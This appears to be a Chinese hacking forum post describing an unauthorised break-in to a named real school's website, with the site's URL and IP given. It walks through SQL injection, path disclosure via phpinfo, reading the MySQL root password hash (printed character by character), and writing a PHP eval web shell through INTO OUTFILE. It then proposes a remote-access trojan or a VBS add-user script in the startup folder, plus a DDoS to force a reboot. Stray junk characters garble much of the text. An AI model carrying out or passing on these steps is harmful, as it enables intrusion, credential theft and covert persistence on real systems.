友情检测湖北省大治市第一中学

admin

第一眼看去，好像全是html静态的，都知道静态的根本不好日，多点击几个专栏
5 ~9 l; Y8 `. u3 m发现这个：http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入！



0 }( @9 B( _. Q) C常规手工不行，尝试突破也不行，利用穿山甲 可以注入：root权限

0 ~. X) z) q& C/ v% {6 |那么想可以直接写入shell ，getshell有几个条件：
- |; G# v( ^" R  M

1、知道站点物理路径

2、有足够大的权限

3、magic_quotes_gpc()=OFF

7 @# n5 R  k: U8 D. G试着爆绝对路径：
1./phpMyAdmin/index.php?lang[]=1  
2./phpMyAdmin/phpinfo.php  
3./load_file()  
, u/ g6 i  ~5 Q  y% l4 [3 _( ]4./phpmyadmin/themes/darkblue_orange/layout.inc.php  
5./phpmyadmin/libraries/select_lang.lib.php  
1 g+ C8 O/ }$ D4 o6./phpmyadmin/libraries/lect_lang.lib.php  
7./phpmyadmin/libraries/mcrypt.lib.php   
8./phpmyadmin/libraries/export/xls.php  
; ]: N  W8 o# O# S; ~7 u
均不行...........................
0 t/ x  S( J8 d  x2 m) K. I- ^' n
御剑扫到这个：http://www.dyyz.net.cn//phpinfo.php       获得网站路径：D:/www/phpinfo.php

3 M8 c5 h5 ~/ t4 E/ z权限为root，知道网站路径，可是条件3不符合，没法写入shell ，不过服务器存在phpmyadmin

默认不行，尝试万能密码：帐号 'localhost'@'@" 密码空 ，登录失败

敏感东西：http://202.103.49.66/Admincp.php  社工进不去...........

$ T3 v6 E, J1 H, r2 E, r! X* _) y想想root还可以读，读到root密码进phpmyadmin 也可以拿shell

9 j# k% i. X( ~! \" L( uhttp://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini

自己修改好读root密码的路径：D:\phpStudy\MySQL\Data\mysql\user.MYD
0 u% K1 O3 R. |+ m7 [' T  N; B' Y
成功读到root密码：
. H( O3 s- g/ r, z- e  Q
17---- r(0072)
18---- o(006f)
" e8 N+ U& t# q" k" g19---- o(006f)
9 o, n1 t( _- F' Q, D; Z3 \& C20---- t(0074)
4 w+ @( A  A3 }* b3 Z7 B; r21---- *(002a)
22---- 8(0038)
23---- 2(0032)
7 O8 Q. W$ }) O6 G0 s24---- E(0045)
25---- 1(0031)
- Y! t3 O3 e) B( P' `26---- C(0043)
# d( v1 p2 U+ b/ j; b0 m27---- 5(0035)
28---- 8(0038)
$ z& `( Y* V) A* W29---- 2(0032)
30---- 8(0038)
31---- A(0041)
32---- 9(0039)
+ |8 L2 W( W8 f( j8 v33---- B(0042)
2 y- b2 m$ Y+ ^0 }9 i. R34---- 5(0035)
" ]2 W. r+ L- T8 x1 z35---- 4(0034)
0 ?0 C* e# V7 e8 x% c- ], A; D2 s36---- 8(0038)
8 i: M& o0 F/ H1 b4 D! }2 p4 P37---- 6(0036)
38---- 4(0034)
39---- 9(0039)
40---- 1(0031)
+ M1 B( a: Q6 R( N8 t+ D41---- 1(0031)
42---- 5(0035)
9 H' E5 u* W8 G* r43---- 3(0033)
44---- 5(0035)
8 P4 x# [" `7 k5 l45---- 9(0039)
7 e/ h% w6 ^! E1 _' s46---- 8(0038)
47---- F(0046)
48---- F(0046)
, K6 E5 t7 D, c( J& s: _% A49---- 4(0034)
50---- F(0046)
51---- 0(0030)
52---- 3(0033)
: f, u. v2 g. L+ d4 r53---- 2(0032)
/ O+ \! Y2 i4 w% s54---- A(0041)
! i# r( W# q# u" S4 `$ H3 [0 Z9 t+ O55---- 4(0034)
56---- A(0041)
57---- B(0042)
58---- *(0044)
) c" s$ }  X7 h+ R4 n0 ?59---- *(0035)
# |& @2 a$ F- V8 a60---- *(0041)
0 O6 J- k, b/ a7 W8 d61---- *0032)

解密后成功登陆phpmyamin
/ T' f9 F' C$ S; q; f                          
" m- ?1 U: W, a4 E; X& M- u
5 U! S! c& J3 l% I$ F- I                             
' v6 s' i: f4 {9 d
找到mysql数据库，执行sql语句：elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'

7 K4 S  Z! i  H9 n% R成功执行，拿下shell，菜刀连接：

8 ]8 m4 n$ N4 g( a7 n  G/ ~服务器不支持asp,aspx,php提权无果...................
/ G' M% D) I' @- [$ @2 S- W: `4 M
但服务器权限很松，上传个远控小马或是一个添加用户的vbs程序到启动里：

服务器上已经有个隐藏帐号了

别名     administrators
6 A1 W; S! K+ }+ T3 A1 u注释     管理员对计算机/域有不受限制的完全访问权

& ~+ |+ \; Z% r

成员

, [2 y; H& C; ]/ v3 y3 c

-------------------------------------------------------------------------------
3 f( A; c* M6 a& b# B" l; madmin
Administrator
slipper$
, V" q0 o& x# p4 V/ Osqluser
# K2 n, [5 c: l3 U: L命令成功完成。

服务器权限很松，上传个vbs添加用户的到启动，不要用bat，会开机的时候显示运行批处理的。

# E9 I$ |+ A4 ~% F8 Z. ?ddos服务器重启，不然就只能坐等服务器重启了...............................

      

angel